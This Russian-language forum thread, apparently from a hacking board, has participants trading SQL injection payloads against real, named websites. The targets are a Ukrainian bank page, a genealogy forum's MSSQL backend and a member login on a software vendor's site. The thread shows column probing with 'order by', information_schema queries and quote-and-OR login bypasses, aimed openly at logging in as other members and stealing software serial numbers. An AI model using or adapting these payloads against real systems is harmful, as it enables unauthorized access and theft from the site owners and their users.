Значение параметра "npcs" передается в функцию js g_inintPath, там преобразоввывается 7 = База=>NPCs=>Humanoids, 7-1 = База=>NPCs=>Undead, и т.д. Заметь, при значении 7-1 содержимое самого списка на странице не меняется, т.е. в скуль попадает только 7, а не 7-1, т.ч. параметр "npcs" фильтруется.
Какой программой можно формировать и посылать на нужный сайт tcp/ip запросы, просматривать пакеты и пр.?
Я не совсем понял тебя про TCP/IP запросы... хм, это что? Если же ты имел виду посылку запросов по HTTP протоколу (POST, GET...) то можно использовать аддоны к файрфоксу. UrlParams - позволяет редактировать как гет так и пост. (https://addons.mozilla.org/ru/firefox/addon/1290) LiveHTTPheaders - показывает запросы и позволяет их отправить повторно, можно при этом их подредактировать. (http://livehttpheaders.mozdev.org/) Tamper Data - позволяет перехватывать запрос и изменять. (http://tamperdata.mozdev.org/help.html)
Нашёл какой-то банковский сайт).Смог подобрать только количество полей: http://www.procreditbank.com.ua/index.php?cat=23&news=3525+order+by+8/* Версия 4,вывода нет.Селект-запросы не проходят,чё делать хз.
посимвольный брут? ---------------------------------------------------- кстате, скулю кажеться прикрыли
http://www.genealogia.ru/ru/oforums/messages.htm?f=299%20and%201=(select%20top%201%20table_name%20from%20information_schema.tables) Там MSSQL, читай маны
ок.. понятно.. там int, а данные передаются в nvenchar, нужно использовать convert(int, ) или cast( , as int) для переобразовки? и еще.. как заюзать limit?) ибо не выходит..)
Там надо не лимит юзать, а not in вроде как. Я не спец, это всего лишь одна из догадок на основе увиденного в соседней теме )
2 sabe По поводу MSSQL вот статья: _https://forum.antichat.ru/thread30501.html Вопрос такой, что в двух словах не объяснишь
http://cyberagesystems.com/member.php на том сайте Login: Admin PAss : '1or'1=1 можно как админом залогинится, только что толку?
1SeTh, никакого)) Попробуй заходить под другими мемберами. там есть какая-то база серийных номеров к программным продуктам. вот их можно спереть.
да ты прав, можно нахляву получить серийники, только мемберов то я незнаю ) еще не понятно тогда как админ редактирует контент?
1SeTh, прописать в логин и пароль что-то типа -99' or email like '%sergey%' /* -99 для того чтобы этой записи в бд точно не было, тогда сработает конструкция or pass'/* за место sergey подбираем слово, которое может входить в мыло.
я пробовал как ты сказал, как бы ни крутил только под логином админа заходишь. вместо слово сергей поставил пару американских имен все равно заходить под логином Admin
1SeTh, я зашел под другим логином вбиваем pizda' or password like '%9%'/* pizda' or password like '%9%'/* входим под grease2 =))))
